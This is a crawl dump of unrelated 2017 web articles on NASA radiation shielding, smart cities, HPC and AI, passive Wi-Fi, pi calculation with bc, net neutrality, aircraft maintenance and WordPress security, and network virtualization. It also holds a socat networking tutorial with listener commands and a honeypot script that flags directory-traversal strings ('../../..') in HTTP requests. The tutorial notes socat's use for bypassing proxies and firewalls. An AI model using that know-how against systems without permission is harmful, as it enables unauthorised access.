CC-MAIN-2017-09
http://lodestone.com/online-training/adobe-illustrator-for-elearning/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00235-ip-10-171-10-108.ec2.internal.warc.gz
en
0.858417
495
3.046875
3
Long term exposure to radiation is one of the biggest challenges in long-duration human spaceflights and NASA is now looking for what it called revolutionary technology that would help protect astronauts from the deadly matter. According to NASA: "Current conventional radiation protection strategy based on materials shielding alone, referred to as passive radiation shielding, is maturing (has been worked on for about three decades) and any progress using the materials radiation shielding would only be evolutionary (incremental) at best. Material shielding would have only limited or no potential for avoiding continuous exposure to radiation. In addition, current material shielding alone for radiation protection for long duration/deep space safe human space missions is prohibitive due to pay load and cost penalties and is not a viable option." More on space: Gigantic changes keep space technology hot What NASA says it is looking for rather is what it calls "Active radiation shielding" technology that it says could include confined and unconfined magnetic fields requiring super-conducting magnets, plasma shields, and electrostatic shields. From NASA: "The biggest advantage of active electrostatic radiation shielding is that by preventing ions from hitting the spacecraft, the unknown harmful biological effects of continuous long duration exposure to space radiation is significantly reduced for galactic cosmic rays and for solar particle events, of great concern for radiation exposure, it is practically eliminated. It is believed that the best strategy for radiation protection and shielding for long duration human missions is to use electrostatic active radiation shielding while, in concert, taking the full advantage of the state-of-the-art evolutionary passive (material) shielding technologies for the much reduced and weaken radiation that may escape and hit the spacecraft. " NASA says the research it expects to see from partners will yield applications such as radiation protection and shielding, radiation dose exposures, sensors and medical applications. Radiation mitigation is part of NASA's list of Grand Challenges. From NASA Grand Challenges site: "Space is an extreme environment that is not conducive to human life. Today's technology can only partially mitigate the effects on the physical and psychological well-being of people. In order to live and effectively work in space for an extended period of time, people require technologies that enable survival in extreme environments; countermeasures that mitigate the negative effects of space; accommodations that optimize human performance; comprehensive space-based physiological and physical health management and prompt and comprehensive medical care in a limited infrastructure." Follow Michael Cooney on Twitter: nwwlayer8 Layer 8 Extra Check out these other hot stories: Google Voice gets into Sprint Mobile phones
<urn:uuid:0f313704-faf4-4d72-9b68-a025db9fe7e8>
CC-MAIN-2017-09
http://www.networkworld.com/article/2228816/security/nasa-wants-revolutionary-radiation-shielding-technology.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00411-ip-10-171-10-108.ec2.internal.warc.gz
en
0.924546
513
3.671875
4
Analysts at Gartner have predicted that half of all smart city objectives will include climate change, resilience and sustainability by 2020. Speaking to an audience at the Gartner Symposium/ITXpo in Barcelona this week, Bettina Tratz-Ryan, research vice president at Gartner, outlined Gartner’s thinking. She discussed how the Internet of Things (IoT) and data analytics will accelerate the development of smart cities. Ms. Tratz-Ryan indicated that as smart cities develop, cities are defining new objectives and measurable outcomes that meet the targets agreed upon at the COP 21 in Paris to reduce greenhouse gas (GHG) emissions. IoT to fight climate change “With the Horizon 2020 goals of energy efficiency, carbon emission reductions and renewable energy in mind, many cities in Europe have launched energy sustainability, resource management, social inclusion and community prosperity initiatives,” Tratz-Ryan said in a statement by Gartner. The statement points out that a number of major cities (Singapore, Gothenburg, Bristol) have adopted schemes to improve traffic and mobility, while Tratz-Ryan noted the increase in ride sharing, as well as improved infrastructure for electric vehicles and congestion charges on combustion engines as examples of cities pushing to tackle climate change. Central to the advancement and execution of clime change goals, Gartner says, is sensors. The company predicts that next year there will be 380 million connected things in use in cities to deliver sustainability and climate change goals, rising to 1.39 billion things by 2020. Supposedly smart commercial buildings and transportation will the main contributors to this, representing 58 percent of the all IoT installed. In buildings “Implementing an integrated business management system (BMS) for lighting and heating and cooling can reduce energy consumption by 50 percent,” claimed Tratz-Ryan. “This is a significant contribution to the commitments of cities to reduce their footprint of GHG.” “Cities will become the environmental centers of excellence for new technology development, offering a stress test environment for the industry,” said Tratz-Ryan. “The advantages for cities will be profound. They will not only meet their mandated targets of the Horizon 2020 goals, but also develop greener and more inclusive city conditions that citizens can acknowledge as KPIs.” Reasons to be doubtful? IoB spoke to Clive Longbottom, analyst at Quocirca, for some expert opinion on these predictions. Longbottom was somewhat sceptical in his emailed comments, citing the power of money as an important factor in the development of smart cities. “All of these things are a fine balancing act between various variables that the designers and founders of a smart city have to consider,” he told IoB. “The biggest of these variables is cost – while it is theoretically possible to create a zero-carbon city, the costs of doing so and of maintaining it would be prohibitive. As such, some compromises have to be taken.” Longbottom also referenced the geopolitical factors at play here, notably the Trump factor. “If Trump does backtrack on the US commitments to changes to try and deal with climate change…then what will this mean to smart cities elsewhere?” he said. “If they do everything they can while the US is building new cities where smog rules and the costs of housing, workers, factories and regulation are very low, can the countries looking to smart cities afford to be so practically pure in their approach?” “If Trump’s decisions mean that China backtracks, taking India, Brazil and other growth economies with it, then sustainability starts to plummet down the priority list of not only smart cities, but every single organization on the planet – it is the only way that they can remain competitive.” Longbottom has a point, though he does acknowledge that the sustainability message has some weight. “What I expect to see is an increase in the amount of greenwash that is seen,” he continued. “If the amount of energy used by a smart city can be lowered for cost reasons (for example, using natural lighting where possible and using LED lights everywhere else), it hits the main variable of cost. That LED lights, being low voltage, can be powered by cheap means (stored or direct solar power, for example) lowers the need for expensive distributed grid power.” Ultimately, however, Longbottom argues that “If the cost of putting in place such a system to save energy exceeded the lifetime savings, it wouldn’t get done – even if it did avoid those emissions and so meet the Paris agreements.”
<urn:uuid:aca7b337-7d7e-48b3-9f92-35f4fee79bb3>
CC-MAIN-2017-09
https://internetofbusiness.com/climate-change-smart-cities-gartner/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00587-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95171
974
2.671875
3
HPC Meets AI and Creates New Grand Challenges The intersection of HPC and AI is creating a vibrant new market: “High Performance Artificial Intelligence” (HPAI) that is fueling the growth of AI platforms and products. After decades of slow progress, HPC has given AI the boost it needed to be taken seriously. Enabled by supercomputing technologies, HPC techniques such as deep learning are transforming AI to make it practical for many new use cases. The necessary ingredients: - Big data, generated by digitized processes, sensors, and instruments - Massive computational power, often in the form of cloud computing, and - Economically attractive use cases are coming together to create a new breed of “Thinking Machines” that can automate complex tasks and decision processes, augmenting or replacing mechanical and electrical machines and people. The intersection of HPC and AI is showing that cognition can be computable in a practical way (see, for example, this 1978 paper titled “Computability and Cognition”). It represents a blend of logic processing with numerically intensive computation. It is an area of intense activity in academic, commercial, industrial, and government settings. HPAI combines HPC (numerically intensive statistical analysis and optimization) with traditional AI (search algorithms and expert systems) to profoundly impact the IT industry and customer investment priorities, to influence every aspect of human life, and to pose its own grand challenges. HPAI techniques, technology drivers and core technologies, characteristics, practical applications, and future directions are all important topics. Here, we focus on the future of HPAI. The Future of HPAI AI has been evolving for decades. Initial inference-based expert systems laid the foundation, and taught us how to formulate and solve AI problems. With deep learning and HPC technologies, AI is taking an evolutionary leap into a new phase. HPAI will include the following challenges and advances: Current algorithms make simplifying assumptions that will be relaxed in the future. In addition to the depth and breadth of layers, there will be cross-links connecting various layers, and dynamically created mini-layers, to provide more flexibility for deep neural networks. Furthermore, while current algorithms iteratively approach an optimum set of parameters, future algorithms will pursue many paths in parallel. More Realistic Neurons Current implementations of neuron models are simplistic, with S-curve like or other simple transfer functions. Real-world neurons have much richer connectivity, and often exhibit very spiky signaling behavior. The frequency of spikes can transmit information as well. Future neural nets will incorporate such additional complexity for higher accuracy and to achieve similar results with fewer neurons in the model. Computational complexity will increase, however. Deep learning is already accelerating new system architecture and component technologies. We expect a period of blossoming innovation across the board: accelerator technologies, new types of CPUs specifically optimized for new workloads, new data storage and processing models such as In-Situ Processing, and entirely novel approaches such as Quantum Computing. These will all evolve rapidly in the coming years. Natural language processing, augmented and virtual reality, haptic and gesture systems, and brain wave analysis are examples of new forms of interaction between humans and information machines. Synergy with IoT and HPC HPAI relies on large bodies of data, which are often generated by sensors and edge devices. Depending on the use case, this data can feed cognitive processing. At the same time, the quest for more accuracy across more and more fathomable situations will continue to justify the designation HPAI. Smart and Autonomous Devices Because learning can be separated from practice, and practice can be computationally cheap, a proliferation of smart devices can be expected. This trend is already visible but will expand to entirely new classes of devices. Edge devices, wearables, artificial limbs and exoskeletons, and near-permanent attachments such as smart contact lenses are examples. A special class of autonomous devices, robots aim to mimic humans and animals. As such, they not only perform tasks better than humans and perform tasks that humans are unable to perform. They will also become increasingly social. Turing tests will be passed. Humans are social animals and can easily develop emotional bonds with robots. This is the ultimate in integration of technology and humans into a single cognitive being. Cyborg technologies will become a permanent part of host humans. Challenges and Grand Challenges HPAI can help solve existing grand challenge problems by better integrating theory, simulation, and experiment, but it will create new grand challenges that span multiple disciplines. HPAI shows that sufficiently complex sets of equations can make cognition computable. But that same complexity makes them unpredictable. Consequences of AI systems are not always adequately or widely understood, and advanced applications of AI can be a monumental case of unintended consequences. In short, system complexity can easily exceed human competence. Like any advanced tool, AI can be used for good or evil. Most often, it is quite straightforward to tell whether the application of a technology is good or bad for its users or the society. With AI, this is not always simple. Current anxieties about AI include the imminent elimination of large classes of jobs by AI systems. Future concerns are about humans making a so-called Darwinian mistake: creating something that will threaten the survival of its creators. Counter arguments point to the still-primitive nature AI systems in terms of the breadth of its capabilities or the more nuanced aspects of human intelligence. An ethical framework, similar to that proposed by Asimov for robots, would allow a more structured discussion. Ethical concerns about AI are valid even as they temper the adoption of AI technologies and require formal efforts to study ethical implications of AI. Arguably a more important parameter than technological advances, and in light of its ethical complexities, AI poses significant challenges for legal systems, and requires new norms and legislation. We expect progress in this area will lag actual deployments of technologies and will be more reactive than proactive. Autonomy will be limited by the precise definition of the tasks that are automated, the environment (exact boundaries) in which they operate, and tolerance for mistakes. Of course, for some tasks, machines do not have to be perfect, but simply better than humans, or more practically, better than the specific human responsible for a task at a given time and place. In such cases, mistakes will be made. Being at peace with a mistake made by a machine may or may not be easier than that made by a human. Society is far from accepting mistakes made by machines at the same level for which human error is accepted. Fully autonomous systems are far from imminent. The intersection of HPC and AI has created the HPAI market, a vibrant and rapidly growing segment with far reaching implications not just for the IT industry but humanity as a whole. Driven by digitization and the dawn of the Information Age, HPAI relies on the presence of large bodies of data, advanced mathematical algorithms, and high performance hardware and software. Just as industrial machines ushered in a new phase in human history, new “information machines” will have a profound impact on every aspect of life. No different than industrial machines, information machines can help when the scope of their activity is fully defined. If it can be defined, it can be automated. Whether, or how well, it can be defined is the crux of the matter. Can we successfully program in Asimov’s three laws?
<urn:uuid:61e1a13b-d3dd-41c0-a504-14c5eac60417>
CC-MAIN-2017-09
https://www.enterprisetech.com/2016/11/11/hpc-meets-ai-creates-new-grand-challenges/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00111-ip-10-171-10-108.ec2.internal.warc.gz
en
0.923437
1,551
2.859375
3
By now, the power hogs on your smartphone and PC are well known: the display, the CPU, and the need to power up your Wi-Fi or 3G radio to send and receive data, all consume power and chip away at your battery life. But researchers have found a way to almost eliminate the power consumed by Wi-Fi, although you’ll need some new chips inside your router and your smartphone. What researchers at the University of Washington are calling “passive Wi-Fi” slashes the power used by 802.11b transmissions to just 59 microwatts, or about 10,000 times less than a conventional Wi-Fi chip would consume. A spinoff, called Jeeva Wireless, has been formed with the intention of commercializing the so-called backscatter technology, the university said. Here’s how it works: Imagine Wi-Fi as a flashlight of sorts, beaming data back and forth. Your router has a flashlight, pointed at your phone, and your phone has one as well. Passive Wi-Fi eliminates one of these flashlights and replaces it with a mirror. Your router still uses its existing Wi-Fi signal to send data to your mobile device; it’s just that the passive Wi-Fi technology simply reflects it back. The stream of reflected, backscattered “off” and “on” signals transmits the data at up to 802.11b speeds, or 11Mbps. Researchers say that they’ve been able to transmit this data between 30 and 100 feet, using both line-of-sight and through-wall scenarios. Why this matters: It’s possible that this could have a significant impact on how your phone sends and receives data. Unfortunately, it will probably require new hardware, both routers and mobile devices. But there’s another scenario: passive Wi-Fi could emerge as an ultra-low-power alternative to Bluetooth, whose Low Energy derivative consumes power in the hundredths of watts, rather than the millionths of watts that passive Wi-Fi requires. That could make it an ideal solution for the Internet of Things. Passive Wi-Fi works on a few assumptions, one of the more important being that the analog and digital portions of the the wireless radio have become increasingly decoupled. Passively listening for a digital signal doesn’t take much power, relatively speaking; it’s the analog broadcasting of a response signal that consumes most of it. Simply reflecting the signal eliminates the vast majority of this power. But something has to generate the transmission power—and in this case, it’s a plugged-in device like a router. A router would require some form of a transceiver that could broadcast a wireless “tone” on a frequency that wouldn’t interfere with the existing Wi-Fi channel. The passive Wi-Fi chip could then “reflect” that tone back at the receiver. But the researchers also said that the technical process of backscattering that information at a given frequency would also bring that tone back into the frequency range used by the Wi-Fi channel—allowing the router or receiver to make sense of it all. The problem is that a passive Wi-Fi system also means that the passive sensor can’t call for attention, or signal the router that it’s ready to transmit data. Instead, routers will have to “order” the passive Wi-Fi device to send data at a given time. That’s not a big deal, although the latency might be a bit higher than normal. In any event, the promise of passive Wi-Fi is still a couple of years off. But it’s a possible future that looks more and more intriguing as we use our mobile devices ever more frequently. This story, "'Passive Wi-Fi' researchers promise to cut Wi-Fi power by 10,000x" was originally published by PCWorld.
<urn:uuid:c69d54f1-1f0d-418c-85d6-8e61f33ef5ae>
CC-MAIN-2017-09
http://www.itnews.com/article/3036777/networking/passive-wi-fi-researchers-promise-to-cut-wi-fi-power-by-10000x.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00287-ip-10-171-10-108.ec2.internal.warc.gz
en
0.942121
822
3.28125
3
Infosec guys are lazy people. At least in my case! There is nothing much boring that typing long shell commands or to perform recurrent tasks. After all, computers are made to make our life easier. Let them work for us! UNIX is a wonderful environment. There are plenty ways to automate tasks: Shell scripts, Perl, Python, etc. When you need to interact with remote devices or servers, classic tools are: Netcat or Expect. Netcat is best known as the “Swiss army knife” of network administrators. Unfortunately, it cannot interact with the remote server. Expect is a powerful scripting tool based on scenarios like “If I receive this information, I do this action or send this information” but it has no network capabilities. During hack.lu last week, a friend explained how to solve a problem using another tool called “Socat“. The name comes from the concatenation of “SOcket” and “cat” (The UNIX command to display files). This tool exists since a few years but I never eared of it. Basically, Socat is a tool to manipulate sockets, one input and one output. But the idea of sockets is too restrictive. The documentation speaks about “data channels” which can be combinations of: - a file - a pipe - a device (ex: a serial line) - a socket (IPv4, IPv6, raw, TCP, UDP, SSL) - a FD (STDIN, STDOUT) - a program or script For each data channel, parameters can be added (port, speed, permissions, owners, etc). For those who use Netcat, the default features remain the same. Example #1: To exchange data via a TCP session across two hosts: hosta$ socat TCP4-LISTEN:31337 OPEN:inputfile,creat,append hostb$ cat datafile | socat - TCP4:hosta:31337 Example #2: To use a local serial line (to configure a network device or access a modem) without a terminal emulator $ socat READLINE,history:/tmp/serial.cmds The “READLINE” data channel uses GNU readline to allow editing and reusing input lines like a classic shell. Example #3: To grab some HTTP content without a browser $ cat <<EOF | socat - TCP4:blog.rootshell.be:80 GET / HTTP/1.1 Host: blog.rootshell.be EOF Example #4: To use Socat to collect Syslog messages # socat -u UDP4-LISTEN:5140,reuseaddr,fork OPEN:/tmp/syslog.msg,creat,append Any UDP packet sent to the port 514 will be logged in /tmp/syslog.msg. Those examples are nice but how to interact with the flows received from the data channel? The “EXEC” channel allow us to specify an external program or script. Using the “fdin=” and “fdout=” parameters, it is easy to parse the information received from the input channel and to send back information. $ socat TCP4:188.8.131.52:31337 EXEC:parse.sh,fdin=3,fdout=4 The following Bash script simulates a web server and can look for suspicious content. If none is found, the visitor is redirected to another site. Note that, for security reasons, “EXEC” does not allow a relative path for the executable. It must be present in your $PATH. #!/bin/bash # # Simple example of honeypot running on HTTP # Usage: socat TCP4-LISTEN:80,reuseaddr,fork EXEC:honeypot.sh,fdin=3,fdout=4 # FD 3 = incoming traffic # FD 4 = traffic sent back to the client # # Define the patterns for bad traffic here BADTRAFFIC1="../../.." BADTRAFFIC2="foobar" # Process the received HTTP headers while read -u 3 BUFFER do [ "$BUFFER" = "^M" ] && break echo $BUFFER | egrep -q -o "($BADTRAFFIC1|$BADTRAFFIC2)" if [ "$?" = "0" ]; then echo "ALERT: Suspicous HTTP: $BUFFER" >>http.log cat <END0 >&4 <html> <body> <h1>This incident has been logged...</h1> </body> </html> END0 exit 0 fi done cat <<END1 >&4 <html> <meta http-equiv="refresh" content="0; url=https://blog.rootshell.be"> <body You will be redirected soon... </body> </html> END1 By using the file descriptors 3 and 4, we can easily read what’s sent by the client and send data into the TCP session. As seen in the examples above, Socat can be used to setup small servers to serve specific content or catch users. It can parse data and react based on the content. It can be used to redirect ports, bypass proxies, firewalls and much more! Commands like Socat have plenty of options and connect be reviewed here. Have a look to the man page for a good overview of all the features. Socat runs on almost all UNIX flavors (MacOS too) and a Cygwin version is available for Windows environment. It’s a must-have in the personal toolbox of all pentesters or security guy…
<urn:uuid:38fcb05b-9288-4ccf-947a-7f4a1097140f>
CC-MAIN-2017-09
https://blog.rootshell.be/2010/10/31/socat-another-network-swiss-army-knife/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00287-ip-10-171-10-108.ec2.internal.warc.gz
en
0.798364
1,210
2.78125
3
It looks like I've missed Pi Day by some fraction of a day, but I can't help but get a little excited when this special day rolls around -- especially if pi turns into pie. And, while I can't remember much past 3.14159 in my head, I know that calculating pi to some outrageous number of digits can be pretty exciting and that we can do that fairly easily on Unix systems. Want to calculate pi to 1,000 digits? 314,159 digits? No problem. You can select just how many digits you want to see, plug that number into a calculation that I'm about to share, and ... voila! OK, depending on how many digits you've selected, there may be quite some time between your hitting the enter key and your shouting "Voila!". But let's take a look at what I should have explained yesterday. First, what is pi? I have a bit of a hard time remembering what I learned in junior high school math, but pi is the ratio between the circumference of a circle and its diameter. We celebrate Pi Day because the date (03/14) corresponds to the first three digits. Some people are even suggesting that yesterday was "rounded up Pi Day" because 03/14/16 is like 3.14159 rounded up to the 10,000ths place. There are several ways to calculate pi. Examples include: pi = 3 + 4/(2x3x4) - 4/(4x5x6) + 4/(6x7x8) ... pi = 4/1 - 4/3 + 4/5 - 4/7 + 4/9 - 4/11 + 4/13 ... The more you string this out, the more precise a value you'll get. But translating these calculations into Unix commands or using your calculator would undoubtedly be a pain -- and might even ruin the spirit of Pi Day for you. Instead, you can use a command called bc that you may or may not have run into in your many excursions into the wonders of Unix. The bc (basic calculator) command provides a high precision calculator on the command line. $ echo 11 + 7 | bc 18 $ echo 256 \* 256 | bc 65536 $ echo 921486914689 / 6 | bc 153581152448 Built into most Linux systems and complemented by a math library, bc can make quick work of calculating pi or, as I should say, quick work of entering the command. Ask for pi to 100 decimal places and it will run in a tiny fraction of a second. Ask for a million decimal places and you're going to have to wait a while. $ time echo "scale=100; 4*a(1)" | bc -l 3.141592653589793238462643383279502884197169399375105820974944592307\ 8164062862089986280348253421170676 real 0m0.003s user 0m0.000s sys 0m0.000s Each of these bc commands is first setting the number of decimal places we want to see (with the scale setting), calling in the bc math library (with the -l option), and providing the seed values for going after pi. What isn't immediately obvious is what a(1) has to do with calculating pi. The a in this calculation represents the inverse tangent or "arctangent" -- yet another way of computing pi. arctan(x) = x − x3/3 + x5/5 − x7/7 + x9/9 − x11/11 + ... For anyone who is mathematically inclined, it may be interesting that bc also includes a number of other useful functions. s(x): the sine of x in radians c(x): the cosine of x in radians a(x): the inverse tangent of x -- the result is returned in radians l(x): the natural logarithm of x e(x): the exponential function ex j(n,x): the Bessel function of order n of x You can also use bc for calculating square roots. $ echo 'sqrt(16)' | bc 4 $ echo 'sqrt(176)' | bc 13 $ echo 'scale=10; sqrt(176)' | bc 13.2664991614 I'm sorry that I didn't get this post up in time for the big day but, if you start now, you might have pi calculated to a billion digits by Pi Day of next year. This article is published as part of the IDG Contributor Network. Want to Join?
<urn:uuid:2934d6f1-bbea-4f8a-af07-fc565c535215>
CC-MAIN-2017-09
http://www.computerworld.com/article/3044109/linux/a-postlude-on-pi-day.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00639-ip-10-171-10-108.ec2.internal.warc.gz
en
0.91487
976
3.015625
3
Net Neutrality is commonly misunderstood. However, it could easily affect our society for generations to come considering the widespread use of the Internet and the innovations that it fosters. This article will briefly explain what Net Neutrality is, why the FCC is involved and better solutions for solving the problem. The Internet has generally worked on a “First Come, First Serve” basis. Meaning, as information flows through the Internet, it is processed and forwarded in the order it was received. This gives every Internet user equal access to all applications and services on the Internet. For example, an Internet user may have a DSL Internet connection from AT&T and may use it to gain access to services from Vonage. Although Vonage is a competitor, AT&T’s network treats their packets of information just the same as they would treat packets from their own services. The neutral Internet has provided opportunity for many innovative ideas and business models to grow and prosper. Equal access has allowed many of those ideas to begin with little or no funding. Facebook and Google are well-known examples. Facebook was started by Mark Zuckerman when he was a college student at Harvard and Google’s first servers were in a friend’s garage near Stanford. Why the FCC is Involved Some major Internet Service Providers (ISPs) have attempted to block or slow down traffic from web hosts the ISP did not want its customers to have access. Recent examples include Comcast requiring Level3 (host for Netflix) to pay for faster access to its customers and Metro PCS blocking traffic from Vonage and Skype. These practices have alarmed customers, industry professionals and web-based service providers especially when some ISPs have a monopoly or duopoly in certain areas that they serve. They may deny customers from accessing desired services, stifle ideas and prevent new and innovative business models from having a chance for success. In an attempt to prevent these problems and keep the status quo of the Internet, the FCC passed a weak set of stipulations preventing land based ISPs from unnecessarily blocking or slowing down content and an even weaker set of stipulations for wireless ISPs. These actions are being challenged in court and Congress. The long term effects of the actions are in doubt especially with the government’s poor track record of solving problems with rules and regulations. For the record, the FCC is not attempting to regulate the Internet. It is only attempting to limit ISPs from selectively blocking or slowing down access to legitimate web sites and services. Competition Solves the Problem The Net Neutrality debate exists because there is not enough competition in the broadband market. Corporations like Comcast and Verizon must maximize their profit and act in the best interest of their shareholders. Their list of priorities does not contain the idealistic goal of protecting an open Internet. This does not make them evil. It is just a fact. How can an open Internet be in sync with the responsibilities of Comcast and Verizon? That is simple. Competition. Christopher Yoo, director of the University of Pennsylvania Law School Center for Technology, Innovation and Competition, agrees. He is quoted in PCWorld as saying the net neutrality debate is less important than spurring broadband competition and implementing the FCC’s national broadband plan, released last March. The net neutrality debates in recent years “probably generated much more attention than they deserved.” If broadband competition was “robust enough, all these issues would go away.” Real time applications like Netflix, online gaming and VoIP (such as business Hosted PBX services) are rapidly becoming the most popular applications on the Internet. Could Verizon and Comcast block or slow down some of this content while going head-to-head against a competitor that does not? Not likely since losing revenue would not be maximizing their profit potential. And that would be far more effective than any regulation government could ever put in place.
<urn:uuid:959117e4-2e04-4a67-95d4-293ed0cb8770>
CC-MAIN-2017-09
http://www.hostmycalls.com/2011/01/27/broadband-competition-will-solve-net-neutrality-better-than-the-fcc/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00639-ip-10-171-10-108.ec2.internal.warc.gz
en
0.960206
788
3.671875
4
What Happened?Before we can draw any wisdom from this tragedy, we must understand the dramatic mechanical failure that caused the engine to free itself from the wing. The McDonnell Douglas DC-10 wing engines are attached to a large arm call the "pylon", which is then attached to the wing, as you can see here: For various maintenance reasons, mechanics need to detach the engine and pylon from the wing. The procedure for doing this, as provided by McDonnell Douglas, calls for the removal of the engine first, followed by the removal of the pylon. However, this process is very time consuming, especially if you don't have a specific reason to detach the engine from the pylon. That's why several carriers, including American Airlines, independently developed procedures for detaching the pylon from the wing while the engine was still attached. AA's procedure involved using a fork lift to hold the engine and assembly while the pylon/wing bolts were removed and re-installed. McDonnell Douglas did not approve this procedure, and may have cautioned against it, but they could not dictate to any airline what procedures were used. As it turns out, it is very difficult to manipulate a heavy engine and pylon assembly using a fork lift with the precision required to avoid damaging the aircraft. In the case of AA flight 191 aircraft, the rear pylon attachment point had been pressed up against the wing too hard, which created a fracture in the pylon's rear bracket. Over the next couple of months, this fracture widened with each take off and landing. When it finally failed, the engine's thrust pulled the entire assembly forward, rotating up and over the front edge of the wing. The engine/pylon took a chunk of the wing with it and cut the wing's hydraulic lines in the process. Inspection of other DC-10 planes after the crash revealed that similar damage had resulted from similar short-cut procedures used by both American and Continental Airlines. ... they provided a safer procedure in the manual. But for McDonnell Douglas, this was little comfort when all DC-10's in the US were grounded for 37 days. Clearly, the majority of responsibility for the flight 191 accident lies with the airline maintenance staff, since they didn't follow the recommended procedure. The aircraft engineers at McDonnell Douglas may very well have anticipated the potential problems with trying to detach the pylon from the wing with the engine still attached, which is why they provided a safer procedure in the manual. But for McDonnell Douglas, this was little comfort when all DC-10's in the US were grounded for 37 days. This caused huge problems for the company in a competitive aircraft market. It was little comfort to the victims and those affected by the crash. Everyone loses in these situations, even those who are "right" about a seemingly arcane technical issue. Lessons about People and ProcessIf software security is about People, Process and Technology, as espoused by Schneier, then these kinds of issues seem to fall squarely in the People and Process categories. Especially when technical pitfalls are documented, it is easy for engineers that are knowledgeable in a particular area to develop ivory tower syndrome and take the stance: "I told you not to do it that way, but if you want to shoot yourself in the foot, by all means..." But if our goal is to provide end-to-end safety or security, then this mentality isn't acceptable. As it turns out, there are things engineers can do, besides just documenting risks, to avoid People and Process problems with Technology. This is certainly not always the case: some problems simply cannot be addressed with Technology alone. But many can be mitigated if those problems can be anticipated to begin with. Typically in software, the downsides of failure are not nearly as serious. However, the kind of displaced fallout that McDonnell Douglas experienced also shows up in software security. One example would be with open source blog software packages, such as WordPress. In a number of discussions I've had with clients and security folk, the topic of WordPress security has come up. Everything I hear indicates that WordPress has a pretty poor reputation in this area. In one way, this seems little odd to me, since I have briefly looked at the core WordPress code base a few times and they do a lot of things right. Sure, WordPress has its share of security issues, don't get me wrong, but the core software isn't that terrible. However, if you do a CVE search for WordPress, the number of vulnerabilities associated with WordPress plugins is quite depressing. To me, it is apparent that bad plugin security has hurt WordPress' reputation around security in general, despite the majority of vulnerabilities lying somewhat out of the core developers' control. Two primary ways that engineers can help guide their technical customers (whether they be other programmers or maintenance crews) down a safe path: discourage dangerous usage and make safe usage much easier than the alternatives. Discouraging Dangerous UsageLet us return to the issue of mechanics trying to remove the engine and pylon assembly all in one piece. If the McDonnell Douglas engineers anticipated that this would be unsafe, then they could have made small changes to the engine/pylon assembly such that when the engine is attached, some of the mounting bolts between the pylon and wing were covered up. In this way, it becomes technically infeasible (short of getting out a hack saw) to carry on with the procedure that the airlines devised. In the case of WordPress, if the core developers realized that many plugin authors keep making mistakes using, say, an unsafe PHP function (there are soooo many to choose from...), then perhaps they could find a way to deploy a default PHP configuration that disables the unsafe functions by default (using the disable_functions option or equivalent). Sure, developers could override this, but it would give many developers pause as to why they have to take that extra step (and then perhaps more of them would actually RTFM). Making Safe Usage EasierOf course, disabling features or otherwise making life difficult for your customers is not the best way to make yourself popular. A better way to encourage safety by developers (or mechanics) would be to devise faster/better solutions to their problems that are also safe. In the case of the airline mechanics, once McDonnell Douglas realized that three airlines were using a short-cut procedure, then they could have evaluated the risks of this and devised another procedure that was both fast and safe. For instance, if they had tested United's method of using a hoist (rather than a fork lift), they may have realized that a hoist is perfectly fine and encouraged the other two airlines to use that method instead. Or perhaps they could have provided a special protective guide, harness, or special jacks that would allow for fine control over the engine/pylon assembly when manipulating it. In the case of WordPress, instead of just disabling dangerous interfaces in PHP, they could also provide alternative interfaces that are much less likely to be misused. For example: database access APIs that don't require developers to write SQL statements by hand, or file access primitives that make directory traversal impossible within a certain sub-tree. Of course it depends on the kinds of mistakes that developers keep making, but by adding APIs that are both safe by default and that save developers time, more and more of the developer population will gravitate toward safe usage.
<urn:uuid:33835174-49db-492e-9745-f4f9f9eb56af>
CC-MAIN-2017-09
http://blog.blindspotsecurity.com/2015_11_01_archive.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00583-ip-10-171-10-108.ec2.internal.warc.gz
en
0.966788
1,498
3.375
3
(Part I) Network Virtualization This is the first part in the series of posts dedicated to network virtualization and path isolation. Virtualization is a technique of simulating a hardware device by using software, usually on standard x86 CPU based servers. Hardware devices that are being virtualized are (in the order from most common) servers, firewalls, switches and routers. Almost all devices that you can think of can be virtualized, we listed the most common ones used within network operations. By using virtualization, we are able to run multiple virtual instances (virtual contexts) of a device, in the same way like we would run “real” hardware devices. Each of these virtualized instances is, of course, running independently and usually operating with separate configuration, enabling separation by purpose. Virtual instances are usually running as multiple contexts on specialised, virtualization enabled device or as Virtual Machines (VMs) on a Hypervisor platform like VMWare of Hyper-V. Network Virtualization is part of above explained virtualization. It is virtulization of networking devices. We are using network virtualization with VLANs on switches to enable multiple broadcast domains (LAN segments) to be connected on one single switch. We are doing the same thing on layer 3 with enabling the router to run multiple routing instances by implementing VRF configuration on it. With VRF we are splitting the router into multiple routers, with VLANs we are splitting switch into multiple switches. We are doing this with the use of software but only on specialized hardware devices that are virtualization enabled. There are two network elements we can virtualize Network virtualization can be as simple as running firewall on a VMWare host. In this case we are just skipping the usage of real hardware appliance for firewalling task. Things can get more complex with requirements for path isolation. Different categories of traffic then need to use same physical devices and their interconnections and have complete data communication isolation between them. Here we are in a situation where we will need to virtualize not only the above mentioned firewall but also router forwarding plane and interconnections between network devices. Ok that’s it! We can not only virtualize network devices but the paths between them to. Let’s see what that means. Enabling virtualization on a switch, we are logically splitting the device into two or more devices (that share same hardware) and deciding which switch port will be used by which instance. Popularly known as VLAN or Virtual LAN. By configuring multiple VRF (Virtual Routing and Forwarding) instances on a Router we are enabling our routing device to run multiple routing tables (separate RIB and FIB instances). Deciding which router port will forward traffic using one of the tables for decision making, we are actually running multiple routers on one hardware router. We split the router. Virtualization of the interconnections can be done as a single-hop virtualization. The best example here is the trunk link connecting two Ethernet switches. Using trunk link to interconnect the switches means 